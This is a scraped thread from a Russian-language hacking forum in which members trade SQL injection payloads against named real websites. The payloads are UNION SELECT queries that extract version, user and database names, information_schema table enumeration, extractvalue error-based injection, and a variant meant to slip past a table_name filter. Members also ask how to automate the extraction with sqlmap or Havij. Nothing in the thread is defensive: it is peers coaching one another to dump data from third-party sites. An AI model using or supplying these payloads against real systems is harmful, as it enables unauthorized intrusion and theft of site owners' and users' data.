ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.01.2014, 19:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
17560
Репутация:
0
|
|
Сообщение от er9j6@
er9j6@ said:
Вбиваешь в Havij, и крутишь
5.1.70-log
так неинтересно!
|
|
|
|
03.01.2014, 20:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
Сообщение от Always
Always said:
так неинтересно!
В пяти шагах отсюда и union есть: http://www.btlt.ru/comp/index.php?a=f&id=911 union select version(),user(),database()
|
|
|
|
03.01.2014, 20:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
17560
Репутация:
0
|
|
Сообщение от Inoms
Inoms said:
В пяти шагах отсюда и union есть: http://www.btlt.ru/comp/index.php?a=f&id=911 union select version(),user(),database()
но мне тот линк интересен, как его крутануть?!
|
|
|
|
04.01.2014, 18:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
такой вопросец,
http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=ascii(substring(user( ),1,1))
не дает вывода на страницу, почуму?
ведь ascii(substring(user(),1,1)) ровняется 116
так нормальнро выводится
http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=116
я как-то запрос не так составл?
|
|
|
|
04.01.2014, 18:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от er9j6@
er9j6@ said:
так не пробовал выводить?
http://www.btlt.ru/comp/index.php?a=f&id=1+union+select+1,2,table_name+fRo M+information_schema.tables+limit+41,1+--+
меня интересует именно мой вопрос
|
|
|
|
04.01.2014, 20:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
Сообщение от qaz
qaz said:
такой вопросец,
http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=ascii(substring(user( ),1,1))
не дает вывода на страницу, почуму?
ведь ascii(substring(user(),1,1)) ровняется 116
так нормальнро выводится
http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=116
я как-то запрос не так составл?
Вызов функций в limit'е ? lol
|
|
|
|
05.01.2014, 00:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
4404
Репутация:
0
|
|
Привет всем, есть инъекция вида
Сообщение от None
http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 0,1)))--
Как можно автоматизировать подбор limit. И как можно узнать другие базы данных, не information_schema. |
|
|
|
05.01.2014, 02:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
4404
Репутация:
0
|
|
Спасибо большое. Скажите ищо пожалуйста где можно по подробнее прочитать про этот тип инъекций.
Сообщение от OxoTnik
OxoTnik said:
И что значит
Сообщение от None
автоматизировать подбор limit
" if author else f"
OxoTnik said:
И что значит
Сообщение от None
автоматизировать подбор limit
Нужно автоматизировать замену и парсинг limit 1,1 ; limit 2,1 ; limit 3,1 для доставания таблиц и баз автоматически.
Или можно что-то сделать с sqlmap? |
|
|
|
05.01.2014, 16:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
4404
Репутация:
0
|
|
Так что, мне никто не поможет
|
|
|
|
05.01.2014, 17:33
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Фильтруется table_name . Что сделать можно?
Сообщение от None
http://www.rubo.ru/%25D1%2580%25D0%25BE%25D1%2581%25D1%2581%25D0%25B8 %25D1%258F/multday.ru'or(ExtractValue(1,concat(0x3a,(select(t able_name)from(information_schema.tables)limit/**/0,1))))='1
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
